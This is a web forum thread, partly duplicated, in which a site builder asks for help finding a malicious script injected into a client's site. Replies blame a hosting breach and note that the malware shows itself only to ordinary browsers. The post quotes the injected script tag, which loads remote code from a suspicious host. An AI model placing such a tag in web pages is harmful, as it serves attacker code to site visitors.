Hacked/Infected files
Permalink
Hello,
One of the sites I built (www.superiorsteelroofing.com) seems to have been infected with some kind of injection script. I have checked through the theme and core files and can't seem to find where on earth the script is attached.
Any ideas where I would look to find and remove this?
Here is the code that's right at the bottom before the closing body tag:
Thanks for your help with this!
One of the sites I built (www.superiorsteelroofing.com) seems to have been infected with some kind of injection script. I have checked through the theme and core files and can't seem to find where on earth the script is attached.
Any ideas where I would look to find and remove this?
Here is the code that's right at the bottom before the closing body tag:
<script src="http://thurse88eksfact.rr.nu/nl.php?p=d"></script>
Thanks for your help with this!
Definitely a problem with your host, Dreamhost, assuming that you secured everything after the major breach they had back in January-ish. See this exchange:
http://webmasters.stackexchange.com/questions/26475/is-someone-hija...
It is possible for the web server itself to insert HTML, so it may not have anything to do with your site (you can check this though by copying your site to a host you can secure, or comparing checksums with a known good installation).
Interestingly, this malware is sniffing based on the User Agent. It only appears when using known browser agents. I assume to get around search engine crawlers finding it.
In any case, you should file a ticket with Dreamhost.
http://webmasters.stackexchange.com/questions/26475/is-someone-hija...
It is possible for the web server itself to insert HTML, so it may not have anything to do with your site (you can check this though by copying your site to a host you can secure, or comparing checksums with a known good installation).
Interestingly, this malware is sniffing based on the User Agent. It only appears when using known browser agents. I assume to get around search engine crawlers finding it.
In any case, you should file a ticket with Dreamhost.
Thank you both for your help and advice. I will be having my client contact their host right away!
all your site is really cool, i like them all
Thank you very much. Your kind words are very much appreciated. We are a little behind updating some more recent sites we've worked on but hope to get them up to share very soon!
If you find out what the source was please post back here. I use Dreamhost for some things so I'm curious what they do about it.
Mike